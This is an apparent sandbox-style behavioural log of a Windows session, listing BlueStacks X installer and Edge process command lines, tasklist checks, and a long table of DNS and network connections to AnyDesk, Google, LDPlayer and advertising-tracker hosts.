BlueStacksWeb.exe --type=renderer --disable-speech-api --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations,NetworkServiceInProcess,TracingServiceInProcess --disable-features=BackgroundFetch,ConsolidatedMovementXY,DnsOverHttpsUpgrade,InstalledApp,MojoVideoCapture,PictureInPicture,SmsReceiver,UseSkiaRenderer,WebPayments,WebUSB --lang=en --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=3 --mojo-platform-channel-handle=3824 /prefetch:1

F:\BlueStacks X\BlueStacksWeb.exe

BlueStacksWeb.exe --type=renderer --disable-speech-api --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations,NetworkServiceInProcess,TracingServiceInProcess --disable-features=BackgroundFetch,ConsolidatedMovementXY,DnsOverHttpsUpgrade,InstalledApp,MojoVideoCapture,PictureInPicture,SmsReceiver,UseSkiaRenderer,WebPayments,WebUSB --lang=en --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=3916 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=168 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=169 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=170 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7652 /prefetch:1

F:\ProjectTitan\Engine\CrashReport.dll

"F:\ProjectTitan\Engine\CrashReport.dll" /UploadBsod

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=172 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=173 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=174 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir "C:\Program Files (x86)\McAfee Security Scan" 2>nul

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Users\Admin\AppData\Local\BlueStacks X\BlueStacks-Installer_5.14.22.1003_amd64_native.exe

"C:\Users\Admin\AppData\Local\BlueStacks X\BlueStacks-Installer_5.14.22.1003_amd64_native.exe" -s -defaultImageName Pie64 -imageToLaunch Pie64 -skipBinaryShortcuts -appToLaunch=bsx

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\Bootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\Bootstrapper.exe" -s -defaultImageName Pie64 -imageToLaunch Pie64 -skipBinaryShortcuts -appToLaunch=bsx

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\BlueStacksInstaller.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\BlueStacksInstaller.exe" -s -defaultImageName="Pie64" -imageToLaunch="Pie64" -skipBinaryShortcuts -appToLaunch="bsx" -parentpath="C:\Users\Admin\AppData\Local\BlueStacks X\BlueStacks-Installer_5.14.22.1003_amd64_native.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\CommonInstallUtils.zip" -o"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\" -aoa

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtRedistx64.zip" -o"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\" -aoa

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-ForceGPU.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-ForceGPU.exe" 1 "C:\Program Files\BlueStacks_nxt"

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe" 1 2

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe" 4 2

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe" 2 2

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe" 1 1

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe" 4 1

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe" 2 1

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-CheckCpu.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-CheckCpu.exe" --cmd checkSSE4

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\\HD-GLCheck.exe" 2

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\PF.zip" -o"C:\Program Files\BlueStacks_nxt" -aoa

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\\HD-GLCheck.exe" 3

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\\HD-GLCheck.exe" 1

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtRedistx64.zip" -o"C:\Program Files\BlueStacks_nxt" -aoa

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 consent.google.com udp
GB 142.250.187.238:443 consent.google.com tcp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 anydesk.com udp
GB 18.244.114.94:443 anydesk.com tcp
GB 18.244.114.94:443 anydesk.com tcp
US 8.8.8.8:53 ad-wa.anydesk.com udp
US 8.8.8.8:53 www.recaptcha.net udp
DE 167.235.224.171:443 ad-wa.anydesk.com tcp
DE 167.235.224.171:443 ad-wa.anydesk.com tcp
GB 142.250.180.3:443 www.recaptcha.net tcp
US 8.8.8.8:53 www.anydesk.com udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 142.250.178.10:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 94.114.244.18.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 104.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 171.224.235.167.in-addr.arpa udp
GB 142.250.178.10:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 cdn.cookielaw.org udp
US 8.8.8.8:53 tracking.g2crowd.com udp
US 104.19.177.52:443 cdn.cookielaw.org tcp
US 104.18.43.31:443 tracking.g2crowd.com tcp
GB 142.250.180.3:443 www.recaptcha.net udp
US 104.19.177.52:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 geolocation.onetrust.com udp
US 172.64.155.119:443 geolocation.onetrust.com tcp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 52.177.19.104.in-addr.arpa udp
US 8.8.8.8:53 31.43.18.104.in-addr.arpa udp
US 8.8.8.8:53 119.155.64.172.in-addr.arpa udp
US 8.8.8.8:53 download.anydesk.com udp
DE 188.40.104.135:443 download.anydesk.com tcp
DE 188.40.104.135:443 download.anydesk.com tcp
GB 18.244.114.94:443 www.anydesk.com tcp
US 8.8.8.8:53 www.dwin1.com udp
US 8.8.8.8:53 js.hs-scripts.com udp
US 8.8.8.8:53 serve.albacross.com udp
US 8.8.8.8:53 scripts.iconnode.com udp
US 104.16.138.209:443 js.hs-scripts.com tcp
GB 18.164.68.15:443 serve.albacross.com tcp
GB 108.138.233.18:443 www.dwin1.com tcp
GB 52.84.90.118:443 scripts.iconnode.com tcp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 js.hs-banner.com udp
US 8.8.8.8:53 js.usemessages.com udp
US 8.8.8.8:53 js.hs-analytics.net udp
US 8.8.8.8:53 lantern.roeyecdn.com udp
US 172.64.153.27:443 js.hs-banner.com tcp
GB 18.245.187.123:443 lantern.roeyecdn.com tcp
BE 64.233.167.157:443 stats.g.doubleclick.net tcp
US 104.16.75.142:443 js.usemessages.com tcp
US 104.17.175.201:443 js.hs-analytics.net tcp
US 8.8.8.8:53 www.google.co.uk udp
US 8.8.8.8:53 api.hubspot.com udp
US 8.8.8.8:53 track.hubspot.com udp
US 172.64.153.27:443 js.hs-banner.com tcp
GB 142.250.200.3:443 www.google.co.uk tcp
US 104.16.117.116:443 track.hubspot.com tcp
US 104.16.118.116:443 track.hubspot.com tcp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 135.104.40.188.in-addr.arpa udp
US 8.8.8.8:53 209.138.16.104.in-addr.arpa udp
US 8.8.8.8:53 15.68.164.18.in-addr.arpa udp
US 8.8.8.8:53 18.233.138.108.in-addr.arpa udp
US 8.8.8.8:53 118.90.84.52.in-addr.arpa udp
US 8.8.8.8:53 27.153.64.172.in-addr.arpa udp
US 8.8.8.8:53 123.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 142.75.16.104.in-addr.arpa udp
US 8.8.8.8:53 201.175.17.104.in-addr.arpa udp
US 8.8.8.8:53 157.167.233.64.in-addr.arpa udp
US 8.8.8.8:53 app.hubspot.com udp
US 8.8.8.8:53 static.hsappstatic.net udp
US 104.17.176.91:443 static.hsappstatic.net tcp
US 104.17.176.91:443 static.hsappstatic.net tcp
US 104.17.176.91:443 static.hsappstatic.net tcp
US 104.17.176.91:443 static.hsappstatic.net tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 116.117.16.104.in-addr.arpa udp
US 8.8.8.8:53 116.118.16.104.in-addr.arpa udp
US 8.8.8.8:53 91.176.17.104.in-addr.arpa udp
US 8.8.8.8:53 new-collect.albacross.com udp
IE 54.76.193.150:443 new-collect.albacross.com tcp
US 8.8.8.8:53 150.193.76.54.in-addr.arpa udp
US 8.8.8.8:53 metrics-fe-na1.hubspot.com udp
US 8.8.8.8:53 boot.net.anydesk.com udp
FR 57.128.101.75:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 relay-98c428ee.net.anydesk.com udp
GB 195.181.165.154:443 relay-98c428ee.net.anydesk.com tcp
US 8.8.8.8:53 75.101.128.57.in-addr.arpa udp
US 8.8.8.8:53 154.165.181.195.in-addr.arpa udp
US 8.8.8.8:53 api.playanext.com udp
GB 18.245.187.128:80 api.playanext.com tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 128.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 7940397.fs1.hubspotusercontent-na1.net udp
US 104.18.41.124:443 7940397.fs1.hubspotusercontent-na1.net tcp
US 8.8.8.8:53 124.41.18.104.in-addr.arpa udp
VN 116.98.255.128:21325 tcp
VN 116.98.255.128:7070 tcp
VN 116.98.255.128:7070 tcp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 connect.facebook.net udp
GB 142.250.180.3:443 www.recaptcha.net udp
GB 163.70.147.23:443 connect.facebook.net tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 23.147.70.163.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
GB 142.250.178.10:443 content-autofill.googleapis.com udp
US 216.239.32.116:443 beacons4.gvt2.com tcp
GB 163.70.147.23:443 connect.facebook.net udp
US 216.239.32.116:443 beacons4.gvt2.com udp
US 8.8.8.8:53 www.facebook.com udp
GB 157.240.214.35:443 www.facebook.com tcp
US 8.8.8.8:53 12375076.fls.doubleclick.net udp
GB 216.58.204.70:443 12375076.fls.doubleclick.net tcp
GB 216.58.204.70:443 12375076.fls.doubleclick.net tcp
US 8.8.8.8:53 lantern.roeye.com udp
IE 18.200.217.224:443 lantern.roeye.com tcp
GB 216.58.204.70:443 12375076.fls.doubleclick.net udp
US 8.8.8.8:53 116.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 35.214.240.157.in-addr.arpa udp
US 8.8.8.8:53 70.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 224.217.200.18.in-addr.arpa udp
US 8.8.8.8:53 snap.licdn.com udp
US 2.19.252.133:443 snap.licdn.com tcp
US 8.8.8.8:53 px.ads.linkedin.com udp
US 13.107.42.14:443 px.ads.linkedin.com tcp
US 8.8.8.8:53 34.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 133.252.19.2.in-addr.arpa udp
US 8.8.8.8:53 14.42.107.13.in-addr.arpa udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 id.google.com udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 www.ldplayer.net udp
GB 79.133.176.211:443 www.ldplayer.net tcp
GB 79.133.176.211:443 www.ldplayer.net tcp
US 8.8.8.8:53 cmp.setupcmp.com udp
US 8.8.8.8:53 cdn.ldplayer.net udp
US 104.26.5.6:443 cmp.setupcmp.com tcp
US 104.26.5.6:443 cmp.setupcmp.com tcp
GB 18.172.153.86:443 cdn.ldplayer.net tcp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
US 104.26.5.6:443 cmp.setupcmp.com tcp
US 8.8.8.8:53 211.176.133.79.in-addr.arpa udp
US 8.8.8.8:53 6.5.26.104.in-addr.arpa udp
US 8.8.8.8:53 86.153.172.18.in-addr.arpa udp
GB 18.172.153.86:443 cdn.ldplayer.net udp
US 8.8.8.8:53 stpd.cloud udp
US 104.18.30.49:443 stpd.cloud tcp
GB 142.250.187.238:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.14:443 apis.google.com udp
US 8.8.8.8:53 www.googletagservices.com udp
GB 142.250.180.2:443 www.googletagservices.com tcp
US 8.8.8.8:53 usersdk.ldmnq.com udp
US 8.8.8.8:53 apien.ldplayer.net udp
SG 8.219.223.66:443 usersdk.ldmnq.com tcp
SG 8.219.223.66:443 usersdk.ldmnq.com tcp
GB 99.86.114.111:443 apien.ldplayer.net tcp
GB 99.86.114.111:443 apien.ldplayer.net tcp
GB 142.250.187.238:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 bat.bing.com udp
US 8.8.8.8:53 www.clarity.ms udp
US 8.8.8.8:53 hm.baidu.com udp
US 8.8.8.8:53 49.30.18.104.in-addr.arpa udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 2.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 111.114.86.99.in-addr.arpa udp
US 8.8.8.8:53 66.223.219.8.in-addr.arpa udp
US 13.107.21.237:443 bat.bing.com tcp
US 13.107.246.64:443 www.clarity.ms tcp
GB 99.86.114.111:443 apien.ldplayer.net udp
US 8.8.8.8:53 region1.google-analytics.com udp
US 216.239.34.36:443 region1.google-analytics.com tcp
US 216.239.34.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 accounts.google.com udp
IE 209.85.203.84:443 accounts.google.com udp
CN 111.45.11.83:443 hm.baidu.com tcp
CN 111.45.11.83:443 hm.baidu.com tcp
US 8.8.8.8:53 tagan.adlightning.com udp
US 8.8.8.8:53 c.amazon-adsystem.com udp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 151.101.129.229:443 cdn.jsdelivr.net tcp
GB 216.137.44.72:443 tagan.adlightning.com tcp
GB 13.224.223.9:443 c.amazon-adsystem.com tcp
CN 111.45.11.83:443 hm.baidu.com tcp
US 8.8.8.8:53 config.aps.amazon-adsystem.com udp
US 8.8.8.8:53 aax.amazon-adsystem.com udp
GB 13.224.223.9:443 c.amazon-adsystem.com tcp
GB 52.84.90.106:443 config.aps.amazon-adsystem.com tcp
US 8.8.8.8:53 x.clarity.ms udp
US 8.8.8.8:53 secure.cdn.fastclick.net udp
US 8.8.8.8:53 tags.crwdcntrl.net udp
US 8.8.8.8:53 cdn.id5-sync.com udp
US 8.8.8.8:53 cdn.hadronid.net udp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
US 8.8.8.8:53 prod.us-east-1.cxm-bcn.publisher-services.amazon.dev udp
US 20.114.190.119:443 x.clarity.ms tcp
GB 23.49.161.153:443 secure.cdn.fastclick.net tcp
GB 23.49.161.153:443 secure.cdn.fastclick.net tcp
GB 18.245.143.118:443 tags.crwdcntrl.net tcp
US 52.207.34.62:443 prod.us-east-1.cxm-bcn.publisher-services.amazon.dev tcp
US 104.22.53.86:443 cdn.id5-sync.com tcp
US 104.22.53.173:443 cdn.hadronid.net tcp
US 8.8.8.8:53 bcp.crwdcntrl.net udp
IE 34.251.46.222:443 bcp.crwdcntrl.net tcp
IE 34.251.46.222:443 bcp.crwdcntrl.net tcp
US 8.8.8.8:53 id.hadron.ad.gt udp
US 8.8.8.8:53 226.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 64.246.107.13.in-addr.arpa udp
US 8.8.8.8:53 36.34.239.216.in-addr.arpa udp
US 8.8.8.8:53 84.203.85.209.in-addr.arpa udp
US 8.8.8.8:53 229.129.101.151.in-addr.arpa udp
US 8.8.8.8:53 72.44.137.216.in-addr.arpa udp
US 8.8.8.8:53 9.223.224.13.in-addr.arpa udp
US 8.8.8.8:53 232.154.172.18.in-addr.arpa udp
US 8.8.8.8:53 118.143.245.18.in-addr.arpa udp
US 8.8.8.8:53 106.90.84.52.in-addr.arpa udp
US 8.8.8.8:53 86.53.22.104.in-addr.arpa udp
US 8.8.8.8:53 173.53.22.104.in-addr.arpa udp
US 172.67.23.234:443 id.hadron.ad.gt tcp
US 8.8.8.8:53 153.161.49.23.in-addr.arpa udp
US 8.8.8.8:53 119.190.114.20.in-addr.arpa udp
US 8.8.8.8:53 62.34.207.52.in-addr.arpa udp
US 8.8.8.8:53 proc.ad.cpe.dotomi.com udp
NL 64.158.223.146:443 proc.ad.cpe.dotomi.com tcp
US 8.8.8.8:53 a.ad.gt udp
US 104.22.5.69:443 a.ad.gt tcp
US 8.8.8.8:53 id5-sync.com udp
US 8.8.8.8:53 gum.criteo.com udp
US 8.8.8.8:53 script.4dex.io udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 prebid-stag.setupad.net udp
DE 162.19.138.119:443 id5-sync.com tcp
DE 162.19.138.119:443 id5-sync.com tcp
US 104.26.8.169:443 script.4dex.io tcp
US 8.8.8.8:53 prg.smartadserver.com udp
US 8.8.8.8:53 mp.4dex.io udp
US 8.8.8.8:53 adx.adform.net udp
US 8.8.8.8:53 prebid-eu.creativecdn.com udp
NL 178.250.1.11:443 gum.criteo.com tcp
NL 178.250.1.11:443 gum.criteo.com tcp
US 8.8.8.8:53 rtb.openx.net udp
US 8.8.8.8:53 bidder.criteo.com udp
US 8.8.8.8:53 prebid.a-mo.net udp
US 8.8.8.8:53 rtb.adxpremium.services udp
DE 162.19.138.119:443 id5-sync.com tcp
US 8.8.8.8:53 lb.eu-1-id5-sync.com udp
US 8.8.8.8:53 222.46.251.34.in-addr.arpa udp
US 8.8.8.8:53 234.23.67.172.in-addr.arpa udp
US 8.8.8.8:53 146.223.158.64.in-addr.arpa udp
US 8.8.8.8:53 69.5.22.104.in-addr.arpa udp
NL 185.184.8.90:443 prebid-eu.creativecdn.com tcp
NL 185.184.8.90:443 prebid-eu.creativecdn.com tcp
US 35.227.252.103:443 rtb.openx.net tcp
US 35.227.252.103:443 rtb.openx.net tcp
FR 149.202.238.96:443 prg.smartadserver.com tcp
FR 149.202.238.96:443 prg.smartadserver.com tcp
DK 37.157.6.233:443 adx.adform.net tcp
DK 37.157.6.233:443 adx.adform.net tcp
NL 178.250.1.8:443 bidder.criteo.com tcp
NL 178.250.1.8:443 bidder.criteo.com tcp
US 172.64.153.78:443 mp.4dex.io tcp
US 172.64.153.78:443 mp.4dex.io tcp
NL 185.106.140.18:443 rtb.adxpremium.services tcp
NL 185.106.140.18:443 rtb.adxpremium.services tcp
NL 145.40.97.66:443 prebid.a-mo.net tcp
NL 145.40.97.66:443 prebid.a-mo.net tcp
